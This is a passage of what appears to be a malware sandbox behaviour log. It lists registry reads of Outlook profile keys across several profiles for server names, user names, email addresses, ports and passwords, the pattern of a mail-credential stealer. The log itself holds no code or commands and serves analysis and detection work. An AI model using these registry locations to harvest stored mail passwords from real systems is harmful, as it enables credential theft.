Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = HTTPMail Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = SMTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = POP3 Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = IMAP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = NNTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = HTTPMail Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = SMTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = POP3 Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = IMAP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = NNTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = HTTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = SMTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = POP3 Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = SMTP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab value_name = IMAP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = SMTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = SMTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = POP3 Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = POP3 User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = SMTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = NNTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = NNTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = NNTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = IMAP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = IMAP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = Email False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = HTTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = HTTP Server URL False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = POP3 User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = IMAP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = HTTPMail User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = HTTPMail Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = SMTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = POP3 Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = IMAP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = NNTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = HTTPMail Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = SMTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = POP3 Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = IMAP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = NNTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = HTTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = SMTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = POP3 Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = SMTP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 value_name = IMAP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = SMTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = SMTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = POP3 Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = POP3 User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = SMTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = NNTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = NNTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = NNTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = IMAP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = IMAP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = Email False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = HTTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = HTTP Server URL False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = POP3 User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = IMAP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = HTTPMail User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = HTTPMail Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = SMTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = POP3 Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = IMAP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = NNTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = HTTPMail Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = SMTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = POP3 Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = IMAP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = NNTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = HTTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = SMTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = POP3 Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = SMTP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a value_name = IMAP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = SMTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = SMTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = POP3 Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = POP3 User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = SMTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = NNTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = NNTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = NNTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = IMAP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = IMAP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = Email False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = HTTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = HTTP Server URL False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = POP3 User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = IMAP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = HTTPMail User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = HTTPMail Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = SMTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = POP3 Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = IMAP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = NNTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = HTTPMail Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = SMTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = POP3 Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = IMAP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = NNTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = HTTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = SMTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = POP3 Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = SMTP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 value_name = IMAP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = SMTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = SMTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = POP3 Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = POP3 User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = SMTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = NNTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = NNTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = NNTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = IMAP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = IMAP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = Email False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = HTTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = HTTP Server URL False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = POP3 User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = IMAP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = HTTPMail User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = HTTPMail Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = SMTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = POP3 Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = IMAP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = NNTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = HTTPMail Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = SMTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = POP3 Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = IMAP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = NNTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = HTTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = SMTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = POP3 Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = SMTP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 value_name = IMAP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = SMTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = SMTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = POP3 Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = POP3 User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = SMTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = NNTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = NNTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = NNTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = IMAP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = IMAP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = Email False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = HTTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = HTTP Server URL False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = POP3 User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = IMAP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = HTTPMail User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = HTTPMail Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = SMTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = POP3 Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = IMAP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = NNTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = HTTPMail Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = SMTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = POP3 Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = IMAP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = NNTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = HTTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = SMTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = POP3 Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = SMTP Port, data = 0, type = REG_NONE False 2
Fn
